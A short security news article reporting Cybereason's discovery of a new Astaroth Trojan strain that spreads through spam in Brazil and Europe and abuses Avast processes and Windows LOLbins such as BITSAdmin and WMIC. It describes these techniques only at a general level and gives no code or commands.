In a blog post, Cybereason’s Nocturnus Research Team has uncovered a new strain of Astaroth Trojan which infects systems by exploiting processes of antivirus software installed in it.
The Trojan is being deployed in spam campaigns in Brazil and Europe where it targeted thousands of computers as of December 2018. It spreads itself via malicious links and .7Zip file attachments. When executed on a system, it disguises as a GIF, JPEG or an extensionless file to escape detection.
If a file from phishing messages or spam emails, which contains the malware, is downloaded and opened; it uses the legitimate Microsoft Windows BITSAdmin Tool to download the full payload from a command-and-control (C2) server.
Once it has been initialized, the Trojan executes an XSL script to establish a connection with the C2 server. The script has functions which help the malware to hide from antivirus and download full payload.
The earlier version of the Astaroth launched a scan to detect antivirus software in its target computer, and if, in particular, Avast Antivirus is detected, it simply quit itself.
However, this modified version of Astaroth abuses Avast software’s Dynamic Link Library and injects a malicious module in one of its processes. In such an abuse, the malware takes advantage by living off the land binaries or LOLbins.
“As we enter 2019, we anticipate that the using of WMIC and other LOLbins will increase, Because of the great potential for malicious exploitation inherent in the use of LOLbins, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines,” said security researchers from Cybereason.